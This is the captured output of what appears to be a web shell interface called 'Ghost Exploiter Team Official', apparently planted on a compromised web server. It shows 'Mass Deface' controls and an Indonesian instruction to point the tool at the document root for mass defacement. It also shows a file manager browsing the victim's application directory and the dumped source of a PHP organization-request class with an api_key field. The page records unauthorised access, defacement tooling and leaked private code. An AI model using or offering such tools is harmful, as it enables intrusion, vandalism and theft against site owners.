Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
app
/
Domain
/
Organizations
/
Requests
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
BaseApiRequest.php
0.269KB
edt
ren
CreateNewOrganizationRe
...
1.3KB
edt
ren
CreateNewOrganizationRe
...
1.3KB
edt
ren
Dto.php
0KB
edt
ren
ResetPasswordNotificati
...
1.28KB
edt
ren
TokenResponse.php
0KB
edt
ren
UpdateOrganizationReque
...
1.297KB
edt
ren
UpdateOrganizationReque
...
1.297KB
edt
ren
<?php declare(strict_types=1); namespace App\Domain\Organizations\Requests; use App\BaseClasses\BaseApiRequest; class UpdateOrganizationRequest extends BaseApiRequest { public static function bodyParameters(): array { return [ 'full_name' => ['description' => 'full_name'], 'short_name' => ['description' => 'short_name'], 'inn' => ['description' => 'inn'], 'kpp' => ['description' => 'kpp'], 'external_id' => ['description' => 'external_id'], 'api_key' => ['description' => 'api_key'], ]; } public static function example(): array { return [ 'full_name' => 'Тестовое предприятие', 'short_name' => 'Тестовое предприятие', 'inn' => '123456789012', 'kpp' => '123456789', 'external_id' => 'test_external_id', 'api_key' => 'test_api_key', ]; } public function rules(): array { return [ 'full_name' => 'string|required', 'short_name' => 'string|required', 'inn' => 'string|required', 'kpp' => 'string|required', 'external_id' => 'string|nullable', 'api_key' => 'string|nullable', ]; } }